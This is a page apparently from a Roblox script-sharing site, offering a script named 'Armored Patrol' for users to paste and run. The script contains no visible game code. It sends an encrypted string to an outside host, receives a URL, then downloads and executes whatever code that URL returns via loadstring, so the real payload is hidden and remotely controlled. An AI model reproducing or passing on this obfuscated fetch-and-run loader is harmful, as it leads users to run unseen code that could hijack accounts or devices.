www.roblox-scripter.com

Script – Armored Patrol

Thank you for using our website
Your script:

				
					local encryptedString = "a3o4N2YzVVBDN3BfUTRtaVcyNTJ4cGdxTVFGMGNFNGcxUlY1NzJCcG0yeXdocGxoVkRIeU9KTi9IYWovREc1Q2JTdlU0TGFpNkdmN3BTR0g="

local success, response = pcall(function()
return game:HttpPost(
  "https://blackballhost.xyz/thing/decryptor.php",
  encryptedString
)
end)

if success then
local success, result = pcall(function()
  return loadstring(game:HttpGet(tostring(response)))()
end)
if success then
  print("Decryption and execution of code were successful")
else
  print("Error executing decrypted code: " .. tostring(result))
end
else
print("Error getting decrypted response: " .. tostring(response))
end